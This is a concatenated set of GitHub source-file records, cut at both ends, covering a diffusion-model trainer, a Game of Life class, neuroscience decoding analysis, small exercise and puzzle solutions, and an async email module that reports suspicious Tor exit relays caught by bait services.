num_train_timesteps=1000,\n beta_schedule=self.config.ddpm_beta_schedule,\n )\n self.optimizer = torch.optim.AdamW(\n self.model.parameters(),\n lr=self.config.gen_lr,\n betas=self.config.gen_betas,\n weight_decay=1e-6,\n )\n self.lr_scheduler = get_scheduler(\n self.config.lr_scheduler,\n optimizer=self.optimizer,\n num_warmup_steps=int(\n self.config.warmup_perc * self.config.train_steps\n ),\n num_training_steps=self.config.train_steps\n // self.config.gradient_accumulation_steps,\n )\n self.model = accelerator.prepare(self.model)\n self.optimizer = accelerator.prepare(self.optimizer)\n trainset = accelerator.prepare(trainset)\n self.lr_scheduler = accelerator.prepare(self.lr_scheduler)\n\n self.ema_model = EMAModel(\n self.model,\n inv_gamma=self.config.ema_inv_gamma,\n power=self.config.ema_power,\n max_value=self.config.ema_max_decay,\n )\n\n run = os.path.split(__file__)[-1].split(\".\")[0]\n accelerator.init_trackers(run)\n\n progress_bar = tqdm(\n total=self.config.train_steps,\n disable=not accelerator.is_local_main_process,\n )\n evaluate_every_n_steps = self.config.train_steps // self.config.n_evals\n self.model.train()\n while self.global_step < self.config.train_steps:\n batch = next(iter(trainset))\n logs = self.train_step(batch, accelerator=accelerator)\n progress_bar.set_postfix(**logs)\n self.logger.log_metrics(logs, step=self.global_step)\n if self.global_step % evaluate_every_n_steps == 0:\n accelerator.wait_for_everyone()\n if accelerator.is_main_process:\n pipeline = DDPMPipeline(\n unet=accelerator.unwrap_model(\n self.ema_model.averaged_model\n ),\n scheduler=self.noise_scheduler,\n )\n self.evaluate(pipeline)\n pipeline.save_pretrained(self.config.learning_progress_path)\n progress_bar.update(1)\n self.global_step += 1\n accelerator.wait_for_everyone()\n accelerator.end_training()\n progress_bar.close()\n\n def train_step(\n self, batch: Dict, accelerator: Accelerator\n ) -> torch.Tensor:\n \"\"\"\n Performs a single gradient update on a given batch.\n\n Args:\n batch: Datasample dictionary. Images should be at key \"input\"\n accelerator: Diffusors Accelerator to train on multiple devices\n \"\"\"\n clean_images = batch[\"input\"]\n\n # Sample noise that we'll add to the images\n noise = torch.randn(clean_images.shape).to(clean_images.device)\n\n # Sample a random timestep for each image\n timesteps = torch.randint(\n 0,\n self.noise_scheduler.config.num_train_timesteps,\n (self.config.batch_size,),\n device=clean_images.device,\n ).long()\n\n # Add noise to the clean images according to the noise magnitude at each timestep. This is the forward diffusion process\n noisy_images = self.noise_scheduler.add_noise(\n clean_images, noise, timesteps\n )\n with accelerator.accumulate(self.model):\n # Predict the noise residual\n model_output = self.model(noisy_images, timesteps).sample\n loss = F.mse_loss(model_output, noise)\n\n accelerator.backward(loss)\n if accelerator.sync_gradients:\n accelerator.clip_grad_norm_(self.model.parameters(), 1.0)\n self.optimizer.step()\n self.lr_scheduler.step()\n self.ema_model.step(self.model)\n self.optimizer.zero_grad()\n\n # Checks if the accelerator has performed an optimization step behind the scenes\n if accelerator.sync_gradients:\n logs = {\n \"loss\": loss.detach().item(),\n \"lr\": self.lr_scheduler.get_last_lr()[0],\n \"step\": self.global_step,\n \"ema_decay\": self.ema_model.decay,\n }\n return logs\n\n def evaluate(self, pipeline) -> np.ndarray:\n \"\"\"\n Performs a single evaluation step at the current state of the model.\n\n Args:\n pipeline: diffusers DDPMPipeline to perfrom inference\n \"\"\"\n deprecate(\n \"todo: remove this check\",\n \"0.10.0\",\n \"when the most used version is >= 0.8.0\",\n )\n if diffusers_version < version.parse(\"0.8.0\"):\n generator = torch.manual_seed(0)\n else:\n generator = torch.Generator(device=pipeline.device).manual_seed(0)\n # run pipeline in inference (sample random noise and denoise)\n images = pipeline(\n generator=generator,\n batch_size=25,\n output_type=\"numpy\",\n ).images\n\n # denormalize the images\n images_processed = (images * 255).round().astype(\"uint8\")\n images_list = [\n Image.fromarray(img.astype(np.int8), \"RGB\")\n for img in images_processed\n ]\n self.logger.log_image(\n key=\"test/examples\",\n images=images_list,\n step=self.global_step,\n )\n return images_processed\n\n def on_fit_start(self):\n \"\"\"\n This method gets executed before a Trainer trains this model.\n\n It tells the W&B logger to watch the model in order to check the\n gradients report the gradients if W&B is online.\n \"\"\"\n from utils import logger\n\n Path(self.config.learning_progress_path).mkdir(\n parents=True, exist_ok=True\n )\n if hasattr(self, \"logger\"):\n if isinstance(self.logger, pl.loggers.WandbLogger):\n try:\n self.logger.watch(self, log=\"all\")\n except ValueError:\n logger.info(\"The model is already on the watchlist\")\n self.wandb_run_id = self.logger.experiment.id\n self.wandb_run_name = self.logger.experiment.name\n","repo_name":"mcschmitz/duck_and_cover","sub_path":"networks/ddpm.py","file_name":"ddpm.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"59448109","text":"import pygame\n\nclass Game:\n\tdef __init__(self):\n\t\tself.liveCells = dict()\n\t\tself.white = pygame.Color(255,255,255)\n\n\tdef addCell(self, pos):\n\t\tself.liveCells[pos] = 0\n\n\tdef countNeighbors(self, pos):\n\t\tneighboringCells = self.getNeighborPositions(pos)\n\t\tneighborCount = 0\n\t\tfor cell in neighboringCells:\n\t\t\tif cell in self.liveCells:\n\t\t\t\tneighborCount += 1\n\t\treturn neighborCount\n\n\tdef getNeighborPositions(self, pos):\n\t\t(x,y) = pos\n\t\treturn ((x-1, y-1),\n\t\t\t\t(x, y-1),\n\t\t\t\t(x+1, y-1),\n\t\t\t\t(x-1, y),\n\t\t\t\t(x+1,y),\n\t\t\t\t(x-1, y+1),\n\t\t\t\t(x, y+1),\n\t\t\t\t(x+1, y+1))\n\n\tdef updateNeighborCounts(self):\n\t\t# initialize min and max to first key x y\n\t\t(minx, miny) = list(self.liveCells.keys())[0]\n\t\tmaxx = minx\n\t\tmaxy = miny\n\t\tfor cell in self.liveCells:\n\t\t\tself.liveCells[cell] = self.countNeighbors(cell)\n\t\t\t# also update min and max\n\t\t\tif cell[0] < minx:\n\t\t\t\tminx = cell[0]\n\t\t\tif cell[0] > maxx:\n\t\t\t\tmaxx = cell[0]\n\t\t\tif cell[1] < miny:\n\t\t\t\tminy = cell[1]\n\t\t\tif cell[1] > maxy:\n\t\t\t\tmaxy = cell[1]\n\t\tself.min = (minx, miny)\n\t\tself.max = (maxx, maxy)\n\n\tdef determineNewCells(self):\n\t\tnewCells = dict()\n\t\tfor cell in self.liveCells:\n\t\t\tfor adjacentCell in self.getNeighborPositions(cell):\n\t\t\t\tif adjacentCell not in self.liveCells and self.countNeighbors(adjacentCell) == 3:\n\t\t\t\t\tnewCells[adjacentCell] = 3\n\t\treturn newCells\n\n\tdef findDyingCells(self):\n\t\tdyingCells = list()\n\t\tfor cell, neighbors in self.liveCells.items():\n\t\t\tif neighbors < 2 or neighbors > 3:\n\t\t\t\tdyingCells.append(cell)\n\t\treturn dyingCells\n\n\tdef nextCycle(self):\n\t\tcellsBeingBorn = self.determineNewCells()\n\t\tfor cell in self.findDyingCells():\n\t\t\tdel self.liveCells[cell]\n\t\tself.liveCells.update(cellsBeingBorn)\n\t\tself.updateNeighborCounts()\n\n\tdef draw(self, screen, offset = (0,0), cellSize = (4,4), color = 'white'):\n\t\tif color == 'white':\n\t\t\tcolor = self.white\n\t\tfor cell in self.liveCells:\n\t\t\tself.drawCell(cell, screen, offset, cellSize, color)\n\n\tdef drawCell(self, cell, screen, offset, cellSize, color):\n\t\tcellRect = self.locateCell(cell, cellSize, offset)\n\t\tscreen.fill(color, cellRect)\n\n\tdef locateCell(self, cell, cellSize, offset):\n\t\tx, y = cell\n\t\txscale, yscale = cellSize\n\t\txoffset, yoffset = offset\n\t\tx = x * xscale + xoffset\n\t\ty = y * yscale + yoffset\n\t\tcellRect = pygame.Rect((x, y), cellSize)\n\t\treturn cellRect\n","repo_name":"malaclypse1/ConwaysGameOfLife","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70870193187","text":"import pandas as pd\nimport pickle\nimport pdb\nimport os\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nimport statsmodels\nfrom tqdm import tqdm\nimport sys\nimport numpy.matlib\n\nsample_from = np.random.choice\n\n\ndef sample_from_population(df, N_trials,N_units,ctr_idx,dur_idx,):\n remove_list = []\n # make sure that the corresponding df has data\n for idx,row in df.iterrows():\n if row.response_hist[0][ctr_idx][dur_idx].size==0 or row.response_hist[1][ctr_idx][dur_idx].size==0:\n remove_list.append(idx)\n df = df.drop(remove_list)\n if df.count==0:\n return [],[],'no_data'\n sub_df = df.sample(n=N_units,replace=True)\n units_this_sample = sub_df.unit_id\n \n orientations = np.random.choice([0,1],N_trials)\n X = np.full((orientations.size,N_units),np.nan)\n\n for ii,ori in enumerate(orientations):\n for jj,unit in enumerate(units_this_sample):\n r_hist = sub_df.iloc[jj].response_hist\n relevant_resp = r_hist[ori][ctr_idx][dur_idx]\n try:\n X[ii,jj] = sample_from(relevant_resp)\n except ValueError:\n print('relevant_resp:',relevant_resp)\n\n return X,orientations,'nominal'\n \ndef sample_from_population_simple(df,N_trials,N_units,ctr_idx,dur_idx,):\n remove_list = []\n # make sure that the corresponding df has data\n for idx,row in df.iterrows():\n if row.response_hist[0][ctr_idx][dur_idx].size==0 or row.response_hist[1][ctr_idx][dur_idx].size==0:\n remove_list.append(idx)\n df_removed = df.drop(remove_list)\n if df.count==0:\n print('bad')\n return [],[],[],[],'no_data'\n try:\n sub_df = df_removed.sample(n=N_units,replace=True)\n except:\n pdb.set_trace()\n units_this_sample = sub_df.unit_id\n \n orientations = np.random.choice([0,1],N_trials)\n orientations = np.sort(orientations)\n X = np.full((orientations.size,N_units),np.nan)\n c_vec = np.full((1,N_units),np.nan)\n i_vec = c_vec.copy()\n for jj,unit in enumerate(units_this_sample):\n c_vec[0,jj] = sub_df.iloc[jj].mean_coeff_shortdur\n i_vec[0,jj] = sub_df.iloc[jj].mean_intercept_shortdur\n r_hist = sub_df.iloc[jj].response_hist\n num_trials_0 = np.sum(orientations==0)\n num_trials_1 = np.sum(orientations==1)\n relevant_resp_0 = r_hist[0][ctr_idx][dur_idx]\n relevant_resp_1 = r_hist[1][ctr_idx][dur_idx]\n try:\n X[0:num_trials_0,jj] = sample_from(relevant_resp_0,size=num_trials_0)\n X[num_trials_0:,jj] = sample_from(relevant_resp_1,size=num_trials_1)\n except ValueError:\n pdb.set_trace()\n print('relevant_resp:',relevant_resp)\n C = numpy.matlib.repmat(c_vec,N_trials,1)\n I = numpy.matlib.repmat(i_vec,N_trials,1)\n \n\n return X,orientations,C,I,'nominal'\n\n\ndef get_performance_for_virtual_session(total_df,N_samplings,N_trials,N_units,ctr_idx,dur_idx):\n performances_that_condition = []\n\n for i in tqdm(range(N_samplings)):\n retry = True\n while retry:\n X,y,reason = sample_from_population(total_df,N_trials,N_units,ctr_idx,dur_idx)\n if reason=='no_data':\n performances_that_condition = []\n return performances_that_condition\n X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25)\n\n X_train = np.insert(X_train,0,1.0,axis=1)\n X_test = np.insert(X_test,0,1.0,axis=1)\n try:\n logreg = sm.Logit(y_train,X_train)\n res = logreg.fit(disp=False,maxiter=100)\n predicted = res.predict(X_test)\n predicted = (predicted>=0.5)\n perf = np.sum(predicted==y_test)/y_test.size\n retry = False\n except Exception as e:\n print(e)\n retry = True\n \n \n performances_that_condition.append(perf)\n return performances_that_condition\n \ndef get_performance_for_virtual_session_simple(total_df,N_samplings,N_trials,N_units,ctr_idx,dur_idx):\n performances_that_condition = []\n performances_that_condition_unweighted = []\n num_spikes_total = []\n num_spikes_differential = []\n for i in tqdm(range(N_samplings)):\n X,y,C,I,reason = sample_from_population_simple(total_df,N_trials,N_units,ctr_idx,dur_idx)\n if reason=='no_data':\n performances_that_condition = []\n return performances_that_condition\n y_pred = np.sum(X*C+I,axis=1)\n y_pred = y_pred>0\n perf = np.sum(y_pred==y)/y.size\n \n C_unweighted = C/np.abs(C)\n y_pred_unweighted = np.sum(X*C_unweighted,axis=1)\n y_pred_unweighted = y_pred_unweighted>0\n perf_unweighted = np.sum(y_pred_unweighted==y)/y.size\n \n num_spikes_total_per_trial = np.squeeze(np.sum(X,axis=1))\n num_spikes_differential_per_trial = np.abs(np.squeeze(np.sum(X*C_unweighted,axis=1)))\n \n performances_that_condition.append(perf)\n performances_that_condition_unweighted.append(perf_unweighted)\n num_spikes_total.append(np.mean(num_spikes_total_per_trial))\n num_spikes_differential.append(np.mean(num_spikes_differential_per_trial))\n return performances_that_condition,performances_that_condition_unweighted,num_spikes_total,num_spikes_differential\n \nif __name__=='__main__':\n which = int(sys.argv[1])\n which = which-1\n # total_df = pd.read_pickle('/camhpc/home/bsriram/v1paper/v1-paper-analysis/Figure4/DecodingOfPopulation_onlyConsistent.df')\n # total_df = pd.read_pickle('Figure4\\DecodingOfPopulation_onlyConsistent.df')\n total_df = pd.read_pickle('/camhpc/home/bsriram/data/Analysis/DecodingOfPopulation_onlyConsistent.df')\n save_loc = '/camhpc/home/bsriram/data/Analysis/PerfByPopsize'\n # save_loc = r'C:\\Users\\bsriram\\Desktop\\Data_V1Paper\\Analysis\\PopulationDecoding'\n # sample N units and create a session for C = 0.15, dur = 0.1\n potential_n_units = np.arange(1,201,1)\n potential_n_units = np.concatenate((potential_n_units,np.arange(205,401,5)),axis=None)\n potential_n_units = np.concatenate((potential_n_units,np.arange(450,1001,50)),axis=None)\n potential_n_units = np.concatenate((potential_n_units,np.arange(1500,10001,500)),axis=None)\n \n # for N_units in potential_n_units:\n N_units = potential_n_units[which]\n N_trials = 1000\n N_samplings = 10000\n potential_orientations = np.array([-45,45])\n \n potential_contrasts = np.array([0,0.15, 1])\n interested_contrasts = np.array([0.15, 1])\n correct_index_ctrs = [1,2]\n potential_durations = np.array([0.05,0.1,0.15, 0.2])\n interested_durations = np.array([0.05,0.1, 0.15,0.2])\n correct_index_durs = [0,1,2,3]\n\n print('running for num population==',N_units)\n file_for_pop_size = 'population_{0}.pickle'.format(N_units)\n data_all_condns = []\n for kk,ctr in enumerate(interested_contrasts):\n ii = correct_index_ctrs[kk]\n for ll,dur in enumerate(interested_durations):\n print('ctr:',ctr,' dur:',dur)\n jj = correct_index_durs[ll]\n data_that_condition = {}\n data_that_condition['contrast'] = ctr\n data_that_condition['duration'] = dur\n perf_that_condn,perf_unweighted,n_spikes_tot,n_spikes_diff = get_performance_for_virtual_session_simple(total_df,N_samplings,N_trials,N_units,ii,jj)\n data_that_condition['performances'] = perf_that_condn\n data_that_condition['performances_unweighted'] = perf_unweighted\n data_that_condition['spikes_total'] = n_spikes_tot\n data_that_condition['spikes_differential'] = n_spikes_diff\n \n data_all_condns.append(data_that_condition)\n print('saving to ',file_for_pop_size)\n with open(os.path.join(save_loc,file_for_pop_size),'wb') as f:\n pickle.dump(data_all_condns,f)\n \n \n \n ","repo_name":"balajisriram/v1-paper-analysis","sub_path":"Figure4/predict_population_requirement.py","file_name":"predict_population_requirement.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"25806307134","text":"#!/usr/bin/env python3\n\"\"\" this module contains the neural network model\"\"\"\n\nimport numpy as np\n\n\nclass NeuralNetwork:\n \"\"\" Neural neetwork with one hidden layer\n performing binary classification\"\"\"\n def __init__(self, nx, nodes):\n \"\"\"class constructor \"\"\"\n if type(nx) != int:\n raise TypeError(\"nx must be an integer\")\n if nx < 1:\n raise ValueError(\"nx must be a positive integer\")\n if type(nodes) != int:\n raise TypeError(\"nodes must be an integer\")\n if nodes < 1:\n raise ValueError(\"nodes must be a positive integer\")\n self.__W1 = np.random.randn(nodes, nx)\n self.__b1 = np.zeros((nodes, 1))\n self.__A1 = 0\n self.__W2 = np.random.randn(1, nodes)\n self.__b2 = 0\n self.__A2 = 0\n\n @property\n def W1(self):\n \"\"\"returns private W1\"\"\"\n return self.__W1\n\n @property\n def b1(self):\n \"\"\"returns private b1 \"\"\"\n return self.__b1\n\n @property\n def A1(self):\n \"\"\" returns private A1\"\"\"\n return self.__A1\n\n @property\n def W2(self):\n \"\"\"returns private W2\"\"\"\n return self.__W2\n\n @property\n def b2(self):\n \"\"\" returns self b2\"\"\"\n return self.__b2\n\n @property\n def A2(self):\n \"\"\"return self A2 \"\"\"\n return self.__A2\n","repo_name":"Nukemenonai/holbertonschool-machine_learning","sub_path":"supervised_learning/0x00-binary_classification/9-neural_network.py","file_name":"9-neural_network.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70586610786","text":"#!/usr/bin/python\n\n# usage: comparechecksums.py original_checksums new_checksums\n\nimport sys\n\nfile1 = sys.argv[1] # original checksums in column 1 of tsv\nfile2 = sys.argv[2] # new checksums in column 1 of tsv\n\nprint('infile1'+':'+file1)\nprint('infile2'+':'+file2)\n\n# get the checksums\n\nfile1checksums = open(file1, 'r') # with open is a bit tidier?\nfile2checksums = open(file2, 'r')\n\nfile1_list = []\nfile2_list = []\n\n# for file 1\nfor line in file1checksums:\n\tv1, v2 = line.split('\\t')\n\tfile1_list.append(v1) # add the ith row checksum\n\nprint(file1_list)\n\n# for file 2\nfor line in file2checksums:\n\tv1, v2 = line.split('\\t')\n\tfile2_list.append(v1) # add the ith row checksum\n\nprint(file2_list)\n\n# print lengths of lists\n\nprint('length infile1'+':',len(file1_list))\nprint('length infile1'+':',len(file2_list))\n\n# test if equal and print results\n\nif file1_list == file2_list:\n\tprint('checksums identical')\nelse:\n\tprint('checksums non-identical')\n\tfor element in file1_list:\n\t\tif element not in file2_list:\n\t\t\tprint('missing elements')\n\t\t\tprint(element)\n\n\n","repo_name":"crj32/python_general_scripts","sub_path":"comparechecksums.py","file_name":"comparechecksums.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10108742117","text":"import sys\ninput = sys.stdin.readline\n\nn, s = map(int, input().split())\nnum_list = list(map(int, input().split()))\n\nans = 0\n\n\ndef subSet(idx, total):\n global ans\n\n if idx >= n:\n return\n total += num_list[idx]\n if total == s:\n ans += 1\n # 부분수열을 만드는 두가지 경우의 수, 현재 값을 뺀 다음값부터 포함시킴\n subSet(idx + 1, total - num_list[idx])\n # 현재 값을 포함시켜 다음값을 찾음\n subSet(idx + 1, total)\n\n\nsubSet(0, 0)\nprint(ans)\n","repo_name":"MaxKim-J/Algo","sub_path":"problems/202101/boj-1182-부분수열의합.py","file_name":"boj-1182-부분수열의합.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"20859956578","text":"from __future__ import print_function # must be first in file \nimport random\n#1\ndef food_id(food):\n ''' Returns categorization of food\n\n food is a string\n returns a string of categories\n '''\n # The data\n fruits = ['apple', 'banana', 'orange']\n citrus = ['orange']\n starchy = ['banana', 'potato']\n\n # Check the category and report\n if food in fruits:\n if food in citrus:\n return 'Citrus, Fruit'\n else:\n return 'NOT Citrus, Fruit'\n else:\n if food in starchy:\n return 'Starchy, NOT Fruit'\n else:\n return 'NOT Starchy, NOT Fruit'\n \n '''\n 1a: \n The code is from line 17\n 1b: \n i:Orange causes line 15 to run\n ii:Apple and banana causes line 17 to run\n iii:Banana and potato causes lin 20 to run\n iv:everything else causes line 22 to run\n 1c: the fruit command is already running so there is no need for the starchy \n line to run anymore.\n '''\n#2 N/A\ndef food_id_test():\n ''' Unit test for food_id\n returns True if good, returns False and prints error if not \n good\n '''\n works = True\n if food_id('orange') != 'Citrus, Fruit':\n works = 'orange bug in food id()'\n if food_id('banana') != 'NOT Citrus, Fruit':\n works = 'banana bug in food_id()' \n # Add tests so that all lines of code are visited during test\n \n if works == True:\n print(\"All good!\")\n return True\n else:\n print(works)\n return False\n#3\ndef f(n):\n \"\"\"Tells you if the number is an integer even, and if its divisible by 6\"\"\"\n if int(n) == n:\n if n % 2:\n print ('The number is odd')\n else:\n if n % 3:\n print ('The number is even')\n else:\n print ('The number is a multiple by 6')\n else:\n print ('The number is not an integer')\n#4\n'''You can try integers, numbers that are divisible by 6, and numbers that are\n even. '''\n#5\ndef f_test():\n '''Testing for code on #5 to see if it works, returns true is it works'''\n works = True\n if f(1) != 'The number is odd':\n works = 'something wrong'\n if f(4) != 'The number is a multiple of 6':\n works = 'something wrong'\n if f(1.4)!= 'The number is an integer':\n works = 'something wrong'\n if f(2) != 'The number is even':\n works = 'something wrong'\n if works == True:\n print ('Alright!')\n return True\n else:\n print (works)\n return False\n#7\n\"\"\"The difference between + as a concatenation and + as numerical addition is that\nconcatenation is adding string and numerical addition is adding numbers\"\"\"\n#8\ndef guess_once():\n secret = random.randint(1, 4)\n print('I have a number between 1 and 4.')\n guess = int(raw_input('Guess: '))\n if guess >= secret:\n print('Too high - my number was', secret)\n if guess <= secret:\n print('Too low - my number was', secret)\n if guess == secret:\n print('Right, my number is', guess, end='!\\n')\n #a\n '''Line 11(102)print thats the user guessed the number correctly'''\n #1.3.4 Function Test\n#9\ndef quiz_decimal (low, high):\n decimal = random.randint \n print ('Type a number between ', low, 'and ', high)\n guesss = int(raw_input('Guess: '))\n if guesss >= decimal:\n print ('No, ', guesss, 'is greater than', high)\nprint(food_id('apple'))\nfood_id_test()\nf(1.1)\nf(2)\nf(3)\nf(6)\nf_test()\nguess_once()\nguess_once()\nquiz_decimal(4, 4.1)\nquiz_decimal(4, 4.1)\n\n","repo_name":"ConnorPark/csp_python_2018-2019","sub_path":"1.3.4/Park_1.3.4.py","file_name":"Park_1.3.4.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4413635359","text":"\"\"\"\n--- Part Two ---\nNow, you just need to put all of the packets in the right order. Disregard the blank lines in your list of received packets.\n\nThe distress signal protocol also requires that you include two additional divider packets:\n\n[[2]]\n[[6]]\nUsing the same rules as before, organize all packets - the ones in your list of received packets as well as the two \ndivider packets - into the correct order.\n\nFor the example above, the result of putting the packets in the correct order is:\n\n[]\n[[]]\n[[[]]]\n[1,1,3,1,1]\n[1,1,5,1,1]\n[[1],[2,3,4]]\n[1,[2,[3,[4,[5,6,0]]]],8,9]\n[1,[2,[3,[4,[5,6,7]]]],8,9]\n[[1],4]\n[[2]]\n[3]\n[[4,4],4,4]\n[[4,4],4,4,4]\n[[6]]\n[7,7,7]\n[7,7,7,7]\n[[8,7,6]]\n[9]\n\nAfterward, locate the divider packets. To find the decoder key for this distress signal, you need to determine the indices of \nthe two divider packets and multiply them together. (The first packet is at index 1, the second packet is at index 2, and so on.) \nIn this example, the divider packets are 10th and 14th, and so the decoder key is 140.\n\n21890\n\"\"\"\n\nfrom functools import cmp_to_key\n\nwith open(\"challenge_13/input.txt\") as fin:\n parts = fin.read().strip().replace(\"\\n\\n\", \"\\n\").split(\"\\n\")\n\n\ndef compare(a, b):\n if isinstance(a, list) and isinstance(b, int):\n b = [b]\n\n if isinstance(a, int) and isinstance(b, list):\n a = [a]\n\n if isinstance(a, int) and isinstance(b, int):\n if a < b:\n return 1\n if a == b:\n return 0\n return -1\n\n if isinstance(a, list) and isinstance(b, list):\n i = 0\n while i < len(a) and i < len(b):\n x = compare(a[i], b[i])\n if x == 1:\n return 1\n if x == -1:\n return -1\n\n i += 1\n\n if i == len(a):\n if len(a) == len(b):\n return 0\n return 1 # a ended first\n\n # If i didn't hit the end of a, it hit the end of b first\n # This means that b is shorter, which is bad\n return -1\n\n\nlists = list(map(eval, parts))\nlists.append([[2]])\nlists.append([[6]])\nlists = sorted(lists, key=cmp_to_key(compare), reverse=True)\n\n\nfor i, li in enumerate(lists):\n if li == [[2]]:\n a = i + 1\n if li == [[6]]:\n b = i + 1\n\nprint(a * b)\n","repo_name":"roswer13/advent-of-code-2022","sub_path":"2022/challenge_13/challenge_part_two.py","file_name":"challenge_part_two.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12196577385","text":"from dataclasses import dataclass\nfrom trystructure_clusters.service_delivery_point_type import ServiceDeliveryPointType\n\n__NAMESPACE__ = \"http://docs.oasis-open.org/ns/emix/2011/06/power\"\n\n\n@dataclass\nclass ServiceDeliveryPoint(ServiceDeliveryPointType):\n class Meta:\n name = \"serviceDeliveryPoint\"\n namespace = \"http://docs.oasis-open.org/ns/emix/2011/06/power\"\n","repo_name":"sietse/compare-schema-generators","sub_path":"trystructure_clusters/service_delivery_point.py","file_name":"service_delivery_point.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39391622089","text":"import json\nimport asyncio\nfrom datetime import datetime, timedelta\nfrom collections import namedtuple\n\nfrom email.message import EmailMessage\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\nfrom dataclasses import dataclass, field\n\nimport aiosmtplib\n\n\n## TODO: Add exception handling\n## TODO: Move incidentReport to other directory\n## TODO: Setup gmail account\n## TODO: Setup secure credential loading system\n## TODO: Write tests\n\n@dataclass\nclass incidentReport:\n\tsenderIP: str\n\tbaitIP: str\n\tbaitService: str\n\tbaitPort: str\n\texitRelayIP: str\n\texitRelayMD: str\n\tbaitSetupTS: str\n\tbaitCatchTS: str\n\trawRequest: str\n\tadditionalInfo: str = field(default=\"None\")\n\n\nclass _email:\n\t_htmlEmailPath = \"src/external/emailTemplate.html\"\n\t_textEmailPath = \"src/external/emailTemplate.txt\"\n\t## NOTE: Temp solution\n\t_authPath = \"secrets/emailAuth.json\"\n\n\tdef __init__(self, hostname: str = \"smtp.gmail.com\", port: int = 465, tls: bool = True) -> None:\n\t\t\"\"\"Here we load the any startup secrets/configurations, and templates\"\"\"\n\t\tself._htmlEmailTemplate = self._loadString(_email._htmlEmailPath)\n\t\tself._textEmailTemplate = self._loadString(_email._textEmailPath)\n\t\t\n\t\t## We'll be sending messages with gmail and using their smtp relay\n\t\tself.smtp_hostname = hostname\n\t\tself.smtp_port = port\n\t\tself.use_tls = tls\n\t\t\n\t\t## We load our email credentials\n\t\tself.username, self.password = self.loadCredentials()\n\t\t\n\t\t## Create an smtp client object for later use\n\t\tself.smtp_client = aiosmtplib.SMTP(self.smtp_hostname, self.smtp_port, self.use_tls)\n\n\n\tdef loadCredentials(self) -> tuple[str, str]:\n\t\twith open(_email._authPath, \"r\") as infile:\n\t\t\tout = json.load(infile)\n\t\treturn out[\"username\"], out[\"password\"]\n\n\n\tdef _loadString(self, pathName: str) -> str:\n\t\twith open(pathName, \"r\") as infile:\n\t\t\treturn infile.read()\n\n\n\tdef _templateReplace(self, templateString: str, incidentDescriptor: str) -> str:\n\t\treturn templateString.format(\n\t\t\tsenderIP = incidentDescriptor.senderIP,\n\t\t\tbaitIP = incidentDescriptor.baitIP,\n\t\t\tbaitService = incidentDescriptor.baitService,\n\t\t\tbaitPort = incidentDescriptor.baitPort,\n\t\t\texitRelayIP = incidentDescriptor.exitRelayIP,\n\t\t\texitRelayMD = incidentDescriptor.exitRelayMD,\n\t\t\tbaitSetupTS = incidentDescriptor.baitSetupTS,\n\t\t\tbaitCatchTS = incidentDescriptor.baitCatchTS,\n\t\t\trawRequest = incidentDescriptor.rawRequest,\n\t\t\tadditionalInfo = incidentDescriptor.additionalInfo\n\t\t)\n\n\n\tasync def sendEmail(self, incidentDescriptor: namedtuple) -> bool:\n\t\t\"\"\"This will send an email about the suspicous exit relay\"\"\"\n\t\ttextEmail = self._templateReplace(self._textEmailTemplate, incidentDescriptor)\n\t\thtmlEmail = self._templateReplace(self._htmlEmailTemplate, incidentDescriptor)\n\t\temailMessage = self._prepareEmailMessage(textEmail, htmlEmail)\n\t\treturn await self._sendEmail(emailMessage) \n\n\n\tdef _prepareEmailMessage(self, textEmail: str, htmlEmail: str) -> bool:\n\t\t## https://realpython.com/python-send-email/#sending-fancy-emails\n\t\tmessage = MIMEMultipart(\"alternative\")\n\n\t\tmessage[\"From\"] = \"beelurer@example.com\"\n\t\tmessage[\"To\"] = \"test-2bcad6@test.mailgenius.com\"\n\t\tmessage[\"Subject\"] = \"Potentially malicious exit relay detected\"\n\n\t\ttextPart = MIMEText(textEmail, \"plain\")\n\t\thtmlPart = MIMEText(htmlEmail, \"html\")\n\n\t\tmessage.attach(textPart)\n\t\tmessage.attach(htmlPart)\n\n\t\treturn message\n\n\n\tasync def _sendEmail(self, emailMessage: EmailMessage) -> bool:\n\t\tasync with self.smtp_client:\n\t\t\t## await self.smtp_client.starttls()\n\t\t\treturn await aiosmtplib.send_message(emailMessage, \n\t\t\t\t\t\t\t\t\t\t\t\tport = self.smtp_port,\n\t\t\t\t\t\t\t\t\t\t\t\thostname = self.smtp_hostname)\n\t\t\n\t\t## TODO: Check whether it is neccessary to manually exec `starttls()` or is \n\t\t## this handled by the context manager\n\n\nasync def main() -> None:\n\tem = _email()\n\n\tincident = incidentReport(senderIP=\"10.11.189.14\", baitIP=\"10.11.189.98\", baitService=\"ftp\",\n\t\t\t\t\t\t\t\tbaitPort=21, exitRelayIP=\"10.11.182.22\", exitRelayMD=\"...\",\n\t\t\t\t\t\t\t\tbaitSetupTS=datetime.now(), baitCatchTS=datetime.now() + timedelta(seconds=4),\n\t\t\t\t\t\t\t\trawRequest=\"xxxx....xxxx\")\n\n\tout = await(em.sendEmail(incident))\n\nif __name__ == 